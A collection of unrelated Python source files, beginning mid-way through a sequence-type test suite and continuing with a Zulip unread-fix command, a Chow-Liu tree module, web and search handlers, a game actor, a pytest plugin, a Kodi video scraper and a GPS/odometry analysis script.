self.assertEqual(u[-2:-1], self.type2test([3]))
self.assertEqual(u[-1000:1000], u)
self.assertEqual(u[1000:-1000], self.type2test([]))
self.assertEqual(u[:], u)
self.assertEqual(u[1:None], self.type2test([1, 2, 3, 4]))
self.assertEqual(u[None:3], self.type2test([0, 1, 2]))
# Extended slices
self.assertEqual(u[::], u)
self.assertEqual(u[::2], self.type2test([0, 2, 4]))
self.assertEqual(u[1::2], self.type2test([1, 3]))
self.assertEqual(u[::-1], self.type2test([4, 3, 2, 1, 0]))
self.assertEqual(u[::-2], self.type2test([4, 2, 0]))
self.assertEqual(u[3::-2], self.type2test([3, 1]))
self.assertEqual(u[3:3:-2], self.type2test([]))
self.assertEqual(u[3:2:-2], self.type2test([3]))
self.assertEqual(u[3:1:-2], self.type2test([3]))
self.assertEqual(u[3:0:-2], self.type2test([3, 1]))
self.assertEqual(u[::-100], self.type2test([4]))
self.assertEqual(u[100:-100:], self.type2test([]))
self.assertEqual(u[-100:100:], u)
self.assertEqual(u[100:-100:-1], u[::-1])
self.assertEqual(u[-100:100:-1], self.type2test([]))
self.assertEqual(u[-100:100:2], self.type2test([0, 2, 4]))
# Test extreme cases with long ints
a = self.type2test([0,1,2,3,4])
self.assertEqual(a[ -pow(2,128): 3 ], self.type2test([0,1,2]))
self.assertEqual(a[ 3: pow(2,145) ], self.type2test([3,4]))
def test_contains(self):
u = self.type2test([0, 1, 2])
for i in u:
self.assertIn(i, u)
for i in min(u)-1, max(u)+1:
self.assertNotIn(i, u)
self.assertRaises(TypeError, u.__contains__)
def test_contains_fake(self):
class AllEq:
# Sequences must use rich comparison against each item
# (unless "is" is true, or an earlier item answered)
# So instances of AllEq must be found in all non-empty sequences.
def __eq__(self, other):
return True
__hash__ = None # Can't meet hash invariant requirements
self.assertNotIn(AllEq(), self.type2test([]))
self.assertIn(AllEq(), self.type2test([1]))
def test_contains_order(self):
# Sequences must test in-order. If a rich comparison has side
# effects, these will be visible to tests against later members.
# In this test, the "side effect" is a short-circuiting raise.
class DoNotTestEq(Exception):
pass
class StopCompares:
def __eq__(self, other):
raise DoNotTestEq
checkfirst = self.type2test([1, StopCompares()])
self.assertIn(1, checkfirst)
checklast = self.type2test([StopCompares(), 1])
self.assertRaises(DoNotTestEq, checklast.__contains__, 1)
def test_len(self):
self.assertEqual(len(self.type2test()), 0)
self.assertEqual(len(self.type2test([])), 0)
self.assertEqual(len(self.type2test([0])), 1)
self.assertEqual(len(self.type2test([0, 1, 2])), 3)
def test_minmax(self):
u = self.type2test([0, 1, 2])
self.assertEqual(min(u), 0)
self.assertEqual(max(u), 2)
def test_addmul(self):
u1 = self.type2test([0])
u2 = self.type2test([0, 1])
self.assertEqual(u1, u1 + self.type2test())
self.assertEqual(u1, self.type2test() + u1)
self.assertEqual(u1 + self.type2test([1]), u2)
self.assertEqual(self.type2test([-1]) + u1, self.type2test([-1, 0]))
self.assertEqual(self.type2test(), u2*0)
self.assertEqual(self.type2test(), 0*u2)
self.assertEqual(self.type2test(), u2*0)
self.assertEqual(self.type2test(), 0*u2)
self.assertEqual(u2, u2*1)
self.assertEqual(u2, 1*u2)
self.assertEqual(u2, u2*1)
self.assertEqual(u2, 1*u2)
self.assertEqual(u2+u2, u2*2)
self.assertEqual(u2+u2, 2*u2)
self.assertEqual(u2+u2, u2*2)
self.assertEqual(u2+u2, 2*u2)
self.assertEqual(u2+u2+u2, u2*3)
self.assertEqual(u2+u2+u2, 3*u2)
class subclass(self.type2test):
pass
u3 = subclass([0, 1])
self.assertEqual(u3, u3*1)
self.assertIsNot(u3, u3*1)
def test_iadd(self):
u = self.type2test([0, 1])
u += self.type2test()
self.assertEqual(u, self.type2test([0, 1]))
u += self.type2test([2, 3])
self.assertEqual(u, self.type2test([0, 1, 2, 3]))
u += self.type2test([4, 5])
self.assertEqual(u, self.type2test([0, 1, 2, 3, 4, 5]))
u = self.type2test("spam")
u += self.type2test("eggs")
self.assertEqual(u, self.type2test("spameggs"))
def test_imul(self):
u = self.type2test([0, 1])
u *= 3
self.assertEqual(u, self.type2test([0, 1, 0, 1, 0, 1]))
def test_getitemoverwriteiter(self):
# Verify that __getitem__ overrides are not recognized by __iter__
class T(self.type2test):
def __getitem__(self, key):
return str(key) + '!!!'
self.assertEqual(next(iter(T((1,2)))), 1)
def test_repeat(self):
for m in range(4):
s = tuple(range(m))
for n in range(-3, 5):
self.assertEqual(self.type2test(s*n), self.type2test(s)*n)
self.assertEqual(self.type2test(s)*(-4), self.type2test([]))
self.assertEqual(id(s), id(s*1))
def test_bigrepeat(self):
import sys
if sys.maxsize <= 2147483647:
x = self.type2test([0])
x *= 2**16
self.assertRaises(MemoryError, x.__mul__, 2**16)
if hasattr(x, '__imul__'):
self.assertRaises(MemoryError, x.__imul__, 2**16)
def test_subscript(self):
a = self.type2test([10, 11])
self.assertEqual(a.__getitem__(0), 10)
self.assertEqual(a.__getitem__(1), 11)
self.assertEqual(a.__getitem__(-2), 10)
self.assertEqual(a.__getitem__(-1), 11)
self.assertRaises(IndexError, a.__getitem__, -3)
self.assertRaises(IndexError, a.__getitem__, 3)
self.assertEqual(a.__getitem__(slice(0,1)), self.type2test([10]))
self.assertEqual(a.__getitem__(slice(1,2)), self.type2test([11]))
self.assertEqual(a.__getitem__(slice(0,2)), self.type2test([10, 11]))
self.assertEqual(a.__getitem__(slice(0,3)), self.type2test([10, 11]))
self.assertEqual(a.__getitem__(slice(3,5)), self.type2test([]))
self.assertRaises(ValueError, a.__getitem__, slice(0, 10, 0))
self.assertRaises(TypeError, a.__getitem__, 'x')
def test_count(self):
a = self.type2test([0, 1, 2])*3
self.assertEqual(a.count(0), 3)
self.assertEqual(a.count(1), 3)
self.assertEqual(a.count(3), 0)
self.assertRaises(TypeError, a.count)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
self.assertRaises(BadExc, a.count, BadCmp())
def test_index(self):
u = self.type2test([0, 1])
self.assertEqual(u.index(0), 0)
self.assertEqual(u.index(1), 1)
self.assertRaises(ValueError, u.index, 2)
u = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(u.count(0), 2)
self.assertEqual(u.index(0), 2)
self.assertEqual(u.index(0, 2), 2)
self.assertEqual(u.index(-2, -10), 0)
self.assertEqual(u.index(0, 3), 3)
self.assertEqual(u.index(0, 3, 4), 3)
self.assertRaises(ValueError, u.index, 2, 0, -10)
self.assertRaises(TypeError, u.index)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
a = self.type2test([0, 1, 2, 3])
self.assertRaises(BadExc, a.index, BadCmp())
a = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(a.index(0), 2)
self.assertEqual(a.index(0, 2), 2)
self.assertEqual(a.index(0, -4), 2)
self.assertEqual(a.index(-2, -10), 0)
self.assertEqual(a.index(0, 3), 3)
self.assertEqual(a.index(0, -3), 3)
self.assertEqual(a.index(0, 3, 4), 3)
self.assertEqual(a.index(0, -3, -2), 3)
self.assertEqual(a.index(0, -4*sys.maxsize, 4*sys.maxsize), 2)
self.assertRaises(ValueError, a.index, 0, 4*sys.maxsize,-4*sys.maxsize)
self.assertRaises(ValueError, a.index, 2, 0, -10)
def test_pickle(self):
lst = self.type2test([4, 5, 6, 7])
lst2 = pickle.loads(pickle.dumps(lst))
self.assertEqual(lst2, lst)
self.assertNotEqual(id(lst2), id(lst))
|
import logging
from argparse import ArgumentParser
from typing import Any, List, Optional
from django.db import connection
from zerver.lib.fix_unreads import fix
from zerver.lib.management import CommandError, ZulipBaseCommand
from zerver.models import Realm, UserProfile
logging.getLogger("zulip.fix_unreads").setLevel(logging.INFO)
class Command(ZulipBaseCommand):
help = """Fix problems related to unread counts."""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument(
"emails", metavar="<emails>", nargs="*", help="email address to spelunk"
)
parser.add_argument("--all", action="store_true", help="fix all users in specified realm")
self.add_realm_args(parser)
def fix_all_users(self, realm: Realm) -> None:
user_profiles = list(
UserProfile.objects.filter(
realm=realm,
is_bot=False,
)
)
for user_profile in user_profiles:
fix(user_profile)
connection.commit()
def fix_emails(self, realm: Optional[Realm], emails: List[str]) -> None:
for email in emails:
try:
user_profile = self.get_user(email, realm)
except CommandError:
print(f"e-mail {email} doesn't exist in the realm {realm}, skipping")
return
fix(user_profile)
connection.commit()
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
if options["all"]:
if realm is None:
raise CommandError("You must specify a realm if you choose the --all option.")
self.fix_all_users(realm)
return
self.fix_emails(realm, options["emails"])
|
#
# Copyright John Reid 2011
#
"""
Chow-Liu Trees
==============
`Chow-Liu trees`_ were originally defined in Chow, C. K.; Liu, C. N. (1968),
"Approximating discrete probability distributions with dependence trees",
IEEE Transactions on Information Theory IT-14 (3): 462-467.
.. _Chow-Liu trees: http://en.wikipedia.org/wiki/Chow-Liu_tree
In this module, each data point is presented as a sequence of discrete-valued features. For example suppose we have data, X = {X},
where each x has n=4 features.
>>> X = [
... 'AACC',
... 'AAGC',
... 'AAGC',
... 'GCTC',
... 'ACTC',
... ]
>>> n = len(X[0])
We can calculate the marginal distribution of each feature
>>> import pybool.chow_liu_trees as CLT
>>> for u in xrange(n):
... print CLT.marginal_distribution(X, u)
defaultdict(<type 'float'>, {'A': 0.80000000000000004, 'G': 0.20000000000000001})
defaultdict(<type 'float'>, {'A': 0.60000000000000009, 'C': 0.40000000000000002})
defaultdict(<type 'float'>, {'C': 0.20000000000000001, 'T': 0.40000000000000002, 'G': 0.40000000000000002})
defaultdict(<type 'float'>, {'C': 1.0})
and also the marginal distribution of a pair of features
>>> print CLT.marginal_pair_distribution(X, 0, 1)
defaultdict(<type 'float'>, {('A', 'A'): 0.60000000000000009, ('G', 'C'): 0.20000000000000001, ('A', 'C'): 0.20000000000000001})
>>> print CLT.marginal_pair_distribution(X, 1, 2)
defaultdict(<type 'float'>, {('A', 'G'): 0.40000000000000002, ('C', 'T'): 0.40000000000000002, ('A', 'C'): 0.20000000000000001})
We can calculate the mutual infomation between all pairs of features
>>> for v in xrange(n):
... for u in xrange(v):
... print u, v, CLT.calculate_mutual_information(X, u, v)
0 1 0.223143551314
0 2 0.223143551314
1 2 0.673011667009
0 3 0.0
1 3 0.0
2 3 0.0
Finally we can build a Chow-Liu tree
>>> T = CLT.build_chow_liu_tree(X, n)
>>> print T.edges(data=True)
[(0, 1, {'weight': -0.22314355131420974}), (0, 3, {'weight': -0}), (1, 2, {'weight': -0.6730116670092563})]
"""
import numpy as N, networkx as nx
from collections import defaultdict
def marginal_distribution(X, u):
"""
Return the marginal distribution for the u'th features of the data points, X.
"""
values = defaultdict(float)
s = 1. / len(X)
for x in X:
values[x[u]] += s
return values
def marginal_pair_distribution(X, u, v):
"""
Return the marginal distribution for the u'th and v'th features of the data points, X.
"""
if u > v:
u, v = v, u
values = defaultdict(float)
s = 1. / len(X)
for x in X:
values[(x[u], x[v])] += s
return values
def calculate_mutual_information(X, u, v):
"""
X are the data points.
u and v are the indices of the features to calculate the mutual information for.
"""
if u > v:
u, v = v, u
marginal_u = marginal_distribution(X, u)
marginal_v = marginal_distribution(X, v)
marginal_uv = marginal_pair_distribution(X, u, v)
I = 0.
for x_u, p_x_u in marginal_u.iteritems():
for x_v, p_x_v in marginal_v.iteritems():
if (x_u, x_v) in marginal_uv:
p_x_uv = marginal_uv[(x_u, x_v)]
I += p_x_uv * (N.log(p_x_uv) - N.log(p_x_u) - N.log(p_x_v))
return I
def build_chow_liu_tree(X, n):
"""
Build a Chow-Liu tree from the data, X. n is the number of features. The weight on each edge is
the negative of the mutual information between those features. The tree is returned as a networkx
object.
"""
G = nx.Graph()
for v in xrange(n):
G.add_node(v)
for u in xrange(v):
G.add_edge(u, v, weight=-calculate_mutual_information(X, u, v))
T = nx.minimum_spanning_tree(G)
return T
if '__main__' == __name__:
import doctest
doctest.testmod()
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from tornado.web import authenticated, HTTPError
from qiita_ware.util import stats_from_df
from qiita_db.study import Study
from qiita_db.metadata_template import SampleTemplate, PrepTemplate
from qiita_db.exceptions import QiitaDBUnknownIDError
from qiita_pet.handlers.base_handlers import BaseHandler
from qiita_core.util import execute_as_transaction
class MetadataSummaryHandler(BaseHandler):
def _get_template(self, constructor, template_id):
"""Given the id and the template constructor, instantiates the template
Parameters
----------
constructor : {PrepTemplate or SampleTemplate}
The template constructor
template_id : str or int
The template id
Returns
-------
PrepTemplate or SampleTemplate instance
The instantiated object
Raises
------
HTTPError
If the template does not exists
"""
try:
template = constructor(int(template_id))
except (QiitaDBUnknownIDError, ValueError):
# By using __name__, it will either display 'SampleTemplate'
# or 'PrepTemplate'
raise HTTPError(500, "%s %s does not exist" %
(constructor.__name__, template_id))
return template
@authenticated
@execute_as_transaction
def get(self, arguments):
study_id = int(self.get_argument('study_id'))
# Get the arguments
prep_template = self.get_argument('prep_template', None)
sample_template = self.get_argument('sample_template', None)
if prep_template and sample_template:
raise HTTPError(500, "You should provide either a sample template "
"or a prep template, but not both")
elif prep_template:
# The prep template has been provided
template = self._get_template(PrepTemplate, prep_template)
back_button_path = (
"/study/description/%s?top_tab=prep_template_tab&sub_tab=%s"
% (study_id, template.id))
elif sample_template:
# The sample template has been provided
template = self._get_template(SampleTemplate, sample_template)
back_button_path = (
"/study/description/%s"
% study_id)
else:
# Neither a sample template or a prep template has been provided
# Fail nicely
raise HTTPError(500, "You should provide either a sample template "
"or a prep template")
study = Study(template.study_id)
# check whether or not the user has access to the requested information
if not study.has_access(self.current_user):
raise HTTPError(403, "You do not have access to access this "
"information.")
df = template.to_dataframe()
num_samples = df.shape[0]
stats = stats_from_df(df)
self.render('metadata_summary.html',
study_title=study.title, stats=stats,
num_samples=num_samples, back_button_path=back_button_path)
|
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from oslo_log import log as logging
import oslo_messaging
from glance.common import utils
from glance.search.plugins import base
LOG = logging.getLogger(__name__)
class MetadefHandler(base.NotificationBase):
def __init__(self, *args, **kwargs):
super(MetadefHandler, self).__init__(*args, **kwargs)
self.namespace_delete_keys = ['deleted_at', 'deleted', 'created_at',
'updated_at', 'namespace_old']
self.property_delete_keys = ['deleted', 'deleted_at',
'name_old', 'namespace', 'name']
def process(self, ctxt, publisher_id, event_type, payload, metadata):
try:
actions = {
"metadef_namespace.create": self.create_ns,
"metadef_namespace.update": self.update_ns,
"metadef_namespace.delete": self.delete_ns,
"metadef_object.create": self.create_obj,
"metadef_object.update": self.update_obj,
"metadef_object.delete": self.delete_obj,
"metadef_property.create": self.create_prop,
"metadef_property.update": self.update_prop,
"metadef_property.delete": self.delete_prop,
"metadef_resource_type.create": self.create_rs,
"metadef_resource_type.delete": self.delete_rs,
"metadef_tag.create": self.create_tag,
"metadef_tag.update": self.update_tag,
"metadef_tag.delete": self.delete_tag,
"metadef_namespace.delete_properties": self.delete_props,
"metadef_namespace.delete_objects": self.delete_objects,
"metadef_namespace.delete_tags": self.delete_tags
}
actions[event_type](payload)
return oslo_messaging.NotificationResult.HANDLED
except Exception as e:
LOG.error(utils.exception_to_str(e))
def run_create(self, id, payload):
self.engine.create(
index=self.index_name,
doc_type=self.document_type,
body=payload,
id=id
)
def run_update(self, id, payload, script=False):
if script:
self.engine.update(
index=self.index_name,
doc_type=self.document_type,
body=payload,
id=id)
else:
doc = {"doc": payload}
self.engine.update(
index=self.index_name,
doc_type=self.document_type,
body=doc,
id=id)
def run_delete(self, id):
self.engine.delete(
index=self.index_name,
doc_type=self.document_type,
id=id
)
def create_ns(self, payload):
id = payload['namespace']
self.run_create(id, self.format_namespace(payload))
def update_ns(self, payload):
id = payload['namespace_old']
self.run_update(id, self.format_namespace(payload))
def delete_ns(self, payload):
id = payload['namespace']
self.run_delete(id)
def create_obj(self, payload):
id = payload['namespace']
object = self.format_object(payload)
self.create_entity(id, "objects", object)
def update_obj(self, payload):
id = payload['namespace']
object = self.format_object(payload)
self.update_entity(id, "objects", object,
payload['name_old'], "name")
def delete_obj(self, payload):
id = payload['namespace']
self.delete_entity(id, "objects", payload['name'], "name")
def create_prop(self, payload):
id = payload['namespace']
property = self.format_property(payload)
self.create_entity(id, "properties", property)
def update_prop(self, payload):
id = payload['namespace']
property = self.format_property(payload)
self.update_entity(id, "properties", property,
payload['name_old'], "property")
def delete_prop(self, payload):
id = payload['namespace']
self.delete_entity(id, "properties", payload['name'], "property")
def create_rs(self, payload):
id = payload['namespace']
resource_type = dict()
resource_type['name'] = payload['name']
if payload['prefix']:
resource_type['prefix'] = payload['prefix']
if payload['properties_target']:
resource_type['properties_target'] = payload['properties_target']
self.create_entity(id, "resource_types", resource_type)
def delete_rs(self, payload):
id = payload['namespace']
self.delete_entity(id, "resource_types", payload['name'], "name")
def create_tag(self, payload):
id = payload['namespace']
tag = dict()
tag['name'] = payload['name']
self.create_entity(id, "tags", tag)
def update_tag(self, payload):
id = payload['namespace']
tag = dict()
tag['name'] = payload['name']
self.update_entity(id, "tags", tag, payload['name_old'], "name")
def delete_tag(self, payload):
id = payload['namespace']
self.delete_entity(id, "tags", payload['name'], "name")
def delete_props(self, payload):
self.delete_field(payload, "properties")
def delete_objects(self, payload):
self.delete_field(payload, "objects")
def delete_tags(self, payload):
self.delete_field(payload, "tags")
def create_entity(self, id, entity, entity_data):
script = ("if (ctx._source.containsKey('%(entity)s'))"
"{ctx._source.%(entity)s += entity_item }"
"else {ctx._source.%(entity)s=entity_list};" %
{"entity": entity})
params = {
"entity_item": entity_data,
"entity_list": [entity_data]
}
payload = {"script": script, "params": params}
self.run_update(id, payload=payload, script=True)
def update_entity(self, id, entity, entity_data, entity_id, field_name):
entity_id = entity_id.lower()
script = ("obj=null; for(entity_item :ctx._source.%(entity)s)"
"{if(entity_item['%(field_name)s'].toLowerCase() "
" == entity_id ) obj=entity_item;};"
"if(obj!=null)ctx._source.%(entity)s.remove(obj);"
"if (ctx._source.containsKey('%(entity)s'))"
"{ctx._source.%(entity)s += entity_item; }"
"else {ctx._source.%(entity)s=entity_list;}" %
{"entity": entity, "field_name": field_name})
params = {
"entity_item": entity_data,
"entity_list": [entity_data],
"entity_id": entity_id
}
payload = {"script": script, "params": params}
self.run_update(id, payload=payload, script=True)
def delete_entity(self, id, entity, entity_id, field_name):
entity_id = entity_id.lower()
script = ("obj=null; for(entity_item :ctx._source.%(entity)s)"
"{if(entity_item['%(field_name)s'].toLowerCase() "
" == entity_id ) obj=entity_item;};"
"if(obj!=null)ctx._source.%(entity)s.remove(obj);" %
{"entity": entity, "field_name": field_name})
params = {
"entity_id": entity_id
}
payload = {"script": script, "params": params}
self.run_update(id, payload=payload, script=True)
def delete_field(self, payload, field):
id = payload['namespace']
script = ("if (ctx._source.containsKey('%(field)s'))"
"{ctx._source.remove('%(field)s')}") % {"field": field}
payload = {"script": script}
self.run_update(id, payload=payload, script=True)
def format_namespace(self, payload):
for key in self.namespace_delete_keys:
if key in payload.keys():
del payload[key]
return payload
def format_object(self, payload):
formatted_object = dict()
formatted_object['name'] = payload['name']
formatted_object['description'] = payload['description']
if payload['required']:
formatted_object['required'] = payload['required']
formatted_object['properties'] = []
for property in payload['properties']:
formatted_property = self.format_property(property)
formatted_object['properties'].append(formatted_property)
return formatted_object
def format_property(self, payload):
prop_data = dict()
prop_data['property'] = payload['name']
for key, value in six.iteritems(payload):
if key not in self.property_delete_keys and value:
prop_data[key] = value
return prop_data
|
# -*- encoding: utf-8 -*-
# pilas engine: un motor para hacer videojuegos
#
# Copyright 2010-2014 - Hugo Ruscitti
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
from pilasengine.actores.actor import Actor
class Piedra(Actor):
"""Representa una piedra que podría ser usada como meteoríto."""
def iniciar(self):
self.definir_tamano('grande')
self.velocidad_rotacion = 1
self.dx = 0
self.dy = 0
def definir_tamano(self, tamano):
if tamano not in ['grande', 'media', 'chica']:
raise Exception("El tamano indicado es incorrecto, solo se permite \
grande', 'media' o 'chica'.")
self.imagen = self.pilas.imagenes.cargar('piedra_' + tamano + '.png')
radios = {'grande': 25, 'media': 20, 'chica': 10}
self.radio_de_colision = radios[tamano]
self.aprender(self.pilas.habilidades.SeMantieneEnPantalla)
def actualizar(self):
"Realiza una actualización de la posición."
self.rotacion += self.velocidad_rotacion
self.x += self.dx
self.y += self.dy
def empujar(self, dx, dy):
self.dx = dx
self.dy = dy
|
# -*- coding: utf-8 -*-
import pytest
from cfme.utils import ports
from cfme.utils.log import logger
def pytest_addoption(parser):
group = parser.getgroup('Port override')
group.addoption('--port-db',
action='store',
default=None,
dest='port_db',
help="Override appliance's database port.")
group.addoption('--port-ssh',
action='store',
default=None,
dest='port_ssh',
help="Override appliance's SSH port.")
@pytest.mark.tryfirst
def pytest_configure(config):
if config.getoption('--help'):
return
# SSH
port_ssh = config.getoption("port_ssh")
if port_ssh is not None:
logger.info("Overriding SSH port to {}.".format(str(port_ssh)))
ports.SSH = int(port_ssh)
# DB
port_db = config.getoption("port_db")
if port_db is not None:
logger.info("Overriding DB port to {}.".format(str(port_db)))
ports.DB = int(port_db)
|
import os
import re
import sys
import urllib
import urllib2
import HTMLParser
from t0mm0.common.net import Net
from t0mm0.common.addon import Addon
addon = Addon('plugin.video.1channel', sys.argv)
BASE_URL = addon.get_setting('domain')
if ((addon.get_setting("enableDomain"))=='true') and (len(addon.get_setting("customDomain")) > 10):
BASE_URL=addon.get_setting("customDomain")
display_name = 'PrimeWire'
required_addons = []
tag = 'PWr'
def get_settings_xml():
return False
def get_results(vid_type, title, year, imdb, tvdb, season, episode):
if vid_type == 'movie':
return Search('movies', title, imdb)
elif vid_type == 'tvshow':
return _get_tvshows(title, year, imdb, tvdb)
elif vid_type == 'season':
return _get_season(title, year, imdb, tvdb, season)
elif vid_type == 'episode':
return _get_episodes(title, year, imdb, tvdb, season, episode)
def GetURL(url):
try: addon.log('Fetching URL: %s' % url)
except: pass
USER_AGENT = 'User-Agent:Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.56'
req = urllib2.Request(url)
req.add_header('User-Agent', USER_AGENT)
host = re.sub('http://', '', BASE_URL)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
try:
response = urllib2.urlopen(req, timeout=10)
body = response.read()
body = unicode(body, 'iso-8859-1')
h = HTMLParser.HTMLParser()
body = h.unescape(body)
except Exception, e:
try: addon.log('Failed to connect to %s: %s' % (url, e))
except: pass
return ''
return body.encode('utf-8')
def Search(section, query, imdb):
html = GetURL(BASE_URL)
r = re.search('input type="hidden" name="key" value="([0-9a-f]*)"', html).group(1)
search_url = BASE_URL + '/index.php?search_keywords='
search_url += urllib.quote_plus(query)
search_url += '&key=' + r
if section == 'tv':
search_url += '&search_section=2'
video_type = 'tvshow'
else:
video_type = 'movie'
html = GetURL(search_url)
r = 'class="index_item.+?href="(.+?)" title="Watch (.+?)"?\(?([0-9]{4})?\)?"?>.+?src="(.+?)"'
regex = re.search(r, html, re.DOTALL)
if regex:
url, title, year, thumb = regex.groups()
net = Net()
cookiejar = addon.get_profile()
cookiejar = os.path.join(cookiejar, 'cookies')
net.set_cookies(cookiejar)
html = net.http_GET(BASE_URL + url).content
net.save_cookies(cookiejar)
adultregex = '<div class="offensive_material">.+<a href="(.+)">I understand'
r = re.search(adultregex, html, re.DOTALL)
if r:
try: addon.log('Adult content url detected')
except: pass
adulturl = BASE_URL + r.group(1)
headers = {'Referer': url}
net.set_cookies(cookiejar)
html = net.http_GET(adulturl, headers=headers).content
net.save_cookies(cookiejar)
for version in re.finditer('<table[^\n]+?class="movie_version(?: movie_version_alt)?">(.*?)</table>',
html, re.DOTALL | re.IGNORECASE):
for s in re.finditer('quality_(?!sponsored|unknown)(.*?)></span>.*?' +
'url=(.*?)&(?:amp;)?domain=(.*?)&(?:amp;)?(.*?)' +
'"version_veiws"> ([\d]+) views</',
version.group(1), re.DOTALL):
q, url, host, parts, views = s.groups()
q = q.upper()
url = url.decode('base-64')
host = host.decode('base-64')
disp_title = '[%s] %s (%s views)' % (q, host, views)
result = {'tag': tag, 'provider_name': display_name}
qs = {'url': url, 'title': title, 'img': thumb, 'year': year, 'imdbnum': imdb, 'video_type': video_type, 'strm': True, 'mode': 'PlaySource'}
result['li_url'] = 'plugin://plugin.video.1channel/?%s' % urllib.urlencode(qs)
print result['li_url']
result['info_labels'] = {'title': disp_title}
yield result
|
#!/usr/bin/python
import os
import math
import re
import struct
import numpy as np
import matplotlib.pyplot as plt
def readstamp(f):
pgmoffset=17
bs=f.read(pgmoffset+4)
x=struct.unpack("<I",bs[pgmoffset:pgmoffset+4])[0]
w = (x>>20) & 0x0fff
n = (x>>16) & 0x000f
t = (x>>0) & 0xffff
return w,n,t
def getTime(gps_pt):
return gps_pt[9]*60 + gps_pt[10]
gps_pts = np.array(np.loadtxt('gps_route.txt'));
vo_pts = np.array(np.loadtxt('viso_points_bb.txt'));
vo_pts_kitti = np.array(np.loadtxt('viso_points_kitti_00.txt'));
plt.figure(figsize=(12,8))
#plt.plot(range(1,len(vo_inter)-1), gps_phis, marker='o', color='r', label="GPS rotation angles")
plt.plot(vo_pts[:,7])
plt.figure(figsize=(12,8))
plt.plot(vo_pts_kitti[:,7])
plt.figure(figsize=(12,8))
plt.plot(gps_pts[:,2])
plt.show()
exit(1)
src_folder = '/home/kreso/projects/master_thesis/datasets/bumblebee/20121031_cycle/';
t_prev=-1
deltas=[]
for name in sorted(os.listdir(src_folder)):
m=re.match(r'fc2.*pgm', name)
if m:
w,n,t=readstamp(open(src_folder+name, mode='rb'))
delta=t-t_prev if t_prev>=0 else 0
if delta<0:
delta+=65536
# print('{} {:01x} {:04x} {}'.format(name, n,t, delta))
t_prev=t
deltas.append(delta)
# cycle_time = num of secs / num of cycles
cycle_time = 111 / sum(deltas)
print("Sum of deltas: ", sum(deltas))
print("Cycle time: ", cycle_time)
# convert delta stamps to delta time
deltas=[x*cycle_time for x in deltas[1:]]
# set odometry start time (0 is start time of first gps point)
vo_start = 3.0 # 2.8 3.3 3.0
vo_times = [vo_start]
# get precise time from timestamps in each frame
for i in range(len(deltas)):
vo_times.append(deltas[i] + vo_times[i])
# we use every 3 frames in odometry
print("Number of frames: ", len(vo_times))
vo_times=vo_times[::3]
vo_pts=vo_pts[::]
print("Number of frames after sampling: ", len(vo_times))
#vo_pts2D=np.ndarray((vo_pts.shape[0], 2))
vo_pts2D=np.zeros((vo_pts.shape[0], 2))
for i in range(len(vo_pts)):
vo_pts2D[i,0]=vo_pts[i,3]
vo_pts2D[i,1]=vo_pts[i,11]
# first point time of gps must be bigger then vis. odo. start time
# otherwise we dont have data to interpolate it
# print(len(gps_pts), gps_pts.shape, len(vo_pts))
t0 = getTime(gps_pts[0])
for i in range(len(gps_pts)):
# cut and break in first gps point with bigger time
if getTime(gps_pts[i])-t0 > vo_times[0]:
gps_pts=gps_pts[i:]
break
# interpoliramo vizualnu odometriju u vremenima
# točaka GPS-a
vo_inter = np.zeros((gps_pts.shape[0], 2))
for i in range(len(gps_pts)):
pt = gps_pts[i]
t = getTime(pt) - t0
#print(t)
for j in range(len(vo_pts2D)):
if vo_times[j] >= t:
if i == 0:
vo_pts_crop = vo_pts2D[j-1:,:]
assert j>0
# print(" -> ", vo_times[j])
alfa = (t - vo_times[j-1]) / (vo_times[j] - vo_times[j-1])
vo_inter[i] = (1-alfa) * vo_pts2D[j-1] + alfa * vo_pts2D[j]
# print(i, vo_inter[i])
break
else:
vo_inter=vo_inter[:i,:]
gps_pts=gps_pts[:i,:]
break
gps_pts = gps_pts[:,0:2]
#print(gps_pts)
#print(vo_pts2D)
#print(vo_inter)
#plt.plot(vo_pts2D[:,0], vo_pts2D[:,1], marker='.', color='r', label="VO_orig")
#plt.plot(vo_pts_crop[:,0], vo_pts_crop[:,1], marker='.', color='b', label="VO_orig")
#plt.plot(vo_inter[:,0], vo_inter[:,1], marker='.', color='b', label="VO_inter")
#plt.show()
#exit(0)
# angle between 2 vectors defined by 3 points using dot product
def calcphi(pt1,pt2,pt3):
v1=pt2-pt1
v2=pt3-pt2
return math.degrees(math.acos(np.dot(v1,v2)/np.linalg.norm(v1)/np.linalg.norm(v2)))
# angle between 2 vectors using vector product (-90, 90)
def calcphi2vec(v1,v2):
return math.degrees(math.asin((v1[0]*v2[1]-v1[1]*v2[0])/
np.linalg.norm(v1)/np.linalg.norm(v2)))
def calcphi2(pt1,pt2,pt3):
v1=pt2-pt1
v2=pt3-pt2
return calcphi2vec(v1,v2)
# angular movement data
gps_phis=np.array([calcphi2(gps_pts[i-1],gps_pts[i],gps_pts[i+1]) for i in range(1,len(vo_inter)-1)])
vo_phis=np.array([calcphi2(vo_inter[i-1],vo_inter[i],vo_inter[i+1]) for i in range(1,len(vo_inter)-1)])
# angular movement difference between gps od visual odometry
# cant do this before vo and gps paths are not mapped with starting point and rotation offset
#gps_vo_phis=[calcphi2vec(gps_pts[i]-gps_pts[i-1], vo_inter[i]-vo_inter[i-1]) for i in range(1,len(vo_inter))]
